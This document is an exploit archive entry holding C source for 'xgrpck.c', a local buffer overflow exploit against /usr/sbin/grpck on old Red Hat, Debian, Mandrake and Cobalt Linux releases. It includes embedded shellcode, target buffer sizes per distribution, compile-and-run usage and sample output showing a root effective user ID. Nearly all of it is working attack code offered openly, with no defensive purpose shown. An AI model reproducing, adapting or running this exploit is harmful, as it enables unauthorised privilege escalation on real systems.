/usr/sbin/grpck local buffer overflow exploit. Note that grpck is not setuid by default. Tested on Red Hat 7.3 and 8.0, Cobalt Linux 6.x and 7.x, Debian 2.1 and 2.2, and Mandrake 8.1 and 8.2.
2f0dd037d94f0621fdf5899a98d3b4876af41cefc6e9b04e0ac95bd98280d88a
/**** xgrpck.c /usr/sbin/grpck local buffer overflow exploit
*
**** when you've run xgrpck.c compiled, you'll have euid=0 in system
**** could you send me please your opinion by e-mail or irc. :)
*
**** Users;
*
**** h4x0r & Script Kiddies & Lamers & Newbies for local buffer overflow exploit
*
**** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning
**** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning
**** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning
****
**** -sh-2.05b$ ls -la /usr/sbin/grpck
**** -rwxr-xr-x 1 root root 22316 Aug 28 2001 /usr/sbin/grpck
**** file is not suid +s mod /usr/sbin/grpck
*
* Vuln Sys ;
*
**** ******* Gentoo Linux *** * *** none Tested
**** ******* SlackwareLinux *** * *** none Tested
**** Testing RedHat Linux 7.3 & 8.0 r0073d
**** Testing Cobalt Linux 6.x & 7.x r0073d
**** Testing Mandrake Linux 8.1 & 8.2 r0073d
**** Testing Debian Linux 2.1 & 2.2 r0073d
**** Testing RedHat Linux 6.x all version none root
**** Testing SuSE Linux x.x all version none root
*
**** Target buffers ;
*
**** RedHat 7.3 & 8.0 : 2517
**** Cobalt 6.x & 7.x : 2197
**** Mandrake 8.1 & 8.2 : 2391
**** Debian 2.1 & 2.2 : 2887 / u are change target buffer
****
**** Usage ;
*
**** sh-2.05b$ /usr/sbin/grpck `perl -e '{print"1337"x2520}'`
**** Segmentation fault (core dumped)
**** sh-2.05b$ gcc -o xgrpck xgrpck.c
**** sh-2.05b$ ./xgrpck
**** xgrpck.c /usr/sbin/grpck local buffer overflow exploit
**** manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com
*
**** w00w0w0000 ! very nice a Day :-D
**** Buffer: 2520
**** sh-2.05b#
**** sh-2.05b# uname -a
**** Linux localhost 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 GNU/Linux
**** sh-2.05b# cat /etc/redhat-release
**** Red Hat Linux release 8.0 (Psyche)
**** sh-2.05b# id
**** uid=513(scan) gid=513 euid=0(root) groups=1(staff)
*
* manowaR@DALnet www.rsf.gen.tr e-mail : Rammstein@secureroot.com
*
* 10 December 2003 05:13
* Greetz: xmax , irc.ulak.net #root my Channel & my Brothers :PcKiLLeR - Avicenna - Pink-cashmere etc ...
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
/* sh33lc0d3 by xmax@EFnet*/
char sh33lc0d3[] =
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char **argv) {
int bsize = 2517; /* buffer size for Redhat Linux */
unsigned long addr;
char *buff;
int i;
if (bsize % 6 != 0) {
bsize = bsize + 6 - (bsize % 6); }
buff = (char *)malloc(bsize);
addr = get_sp();
system("clear");
fprintf(stderr, "xgrpck.c /usr/sbin/grpck local buffer overflow exploit\n");
fprintf(stderr, "manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com\n\n", addr);
fprintf(stderr, "w00w0w0000 ! very nice a Day :-D \n", addr);
fprintf(stderr, "Buffer: %d\n", bsize);
for(i = 0; i < bsize; i++)
{
*(long *)&buff[i] = 0xbfffe5bc;
}
*(long *)&buff[bsize - 6] = addr;
memcpy(buff + bsize - strlen(sh33lc0d3) - 8, sh33lc0d3, strlen(sh33lc0d3));
execl("/usr/sbin/grpck", "grpck", buff, NULL);
return 0;
}
/* manowaR */